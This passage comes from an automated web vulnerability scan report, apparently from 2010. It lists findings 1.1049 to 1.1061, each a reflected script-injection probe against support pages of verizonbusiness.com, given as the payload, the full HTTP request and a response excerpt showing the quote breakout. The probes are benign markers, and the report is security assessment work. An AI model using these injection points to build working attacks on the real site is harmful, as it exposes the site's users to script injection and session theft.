var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1049. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10df1"%3b28c9b65fbe2 was submitted in the REST URL parameter 1. This input was echoed as 10df1";28c9b65fbe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support10df1"%3b28c9b65fbe2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:13 GMT
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support10df1";28c9b65fbe2/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1050. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8df3c'%3bfdb55deb1df was submitted in the REST URL parameter 1. This input was echoed as 8df3c';fdb55deb1df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support8df3c'%3bfdb55deb1df/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support8df3c';fdb55deb1df/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1051. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cb8c'%3ba354101715 was submitted in the REST URL parameter 1. This input was echoed as 1cb8c';a354101715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support1cb8c'%3ba354101715/myaccount/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:48 GMT
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support1cb8c';a354101715/myaccount/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1052. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2796"%3b9baff890e09 was submitted in the REST URL parameter 1. This input was echoed as e2796";9baff890e09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporte2796"%3b9baff890e09/myaccount/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supporte2796";9baff890e09/myaccount/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1053. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80bc'%3be1012bde3f2 was submitted in the REST URL parameter 2. This input was echoed as d80bc';e1012bde3f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountd80bc'%3be1012bde3f2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:14 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountd80bc';e1012bde3f2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1054. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba6b0"%3b2a7864776f6 was submitted in the REST URL parameter 2. This input was echoed as ba6b0";2a7864776f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountba6b0"%3b2a7864776f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountba6b0";2a7864776f6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1055. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3c9'%3b622ffe19eef was submitted in the REST URL parameter 1. This input was echoed as 5b3c9';622ffe19eef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support5b3c9'%3b622ffe19eef/myaccount/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support5b3c9';622ffe19eef/myaccount/tools/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1056. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f39"%3b0dd42e83298 was submitted in the REST URL parameter 1. This input was echoed as 36f39";0dd42e83298 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support36f39"%3b0dd42e83298/myaccount/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support36f39";0dd42e83298/myaccount/tools/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.1057. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462a6"%3b1ec12769be was submitted in the REST URL parameter 2. This input was echoed as 462a6";1ec12769be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount462a6"%3b1ec12769be/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:09 GMT
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount462a6";1ec12769be/tools/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.1058. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5df34'%3b893a65c90a7 was submitted in the REST URL parameter 2. This input was echoed as 5df34';893a65c90a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount5df34'%3b893a65c90a7/tools/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount5df34';893a65c90a7/tools/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1059. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ca91"%3b8aa117c2337 was submitted in the REST URL parameter 3. This input was echoed as 5ca91";8aa117c2337 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools5ca91"%3b8aa117c2337/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:50 GMT
Content-Type: text/html
Content-Length: 43848
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools5ca91";8aa117c2337/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1060. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af86e'%3bd0c97b54d0 was submitted in the REST URL parameter 3. This input was echoed as af86e';d0c97b54d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsaf86e'%3bd0c97b54d0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:22 GMT
Content-Type: text/html
Content-Length: 43846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsaf86e';d0c97b54d0/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1061. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5246"%3b53f8d206358 was submitted in the REST URL parameter 1. This input was echoed as e5246";53f8d206358 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supporte5246"%3b53f8d206358/myaccount/tools/center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:32:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40660
Date: Wed, 17 Nov 2010 00:32:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supporte5246";53f8d206358/myaccount/tools/center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

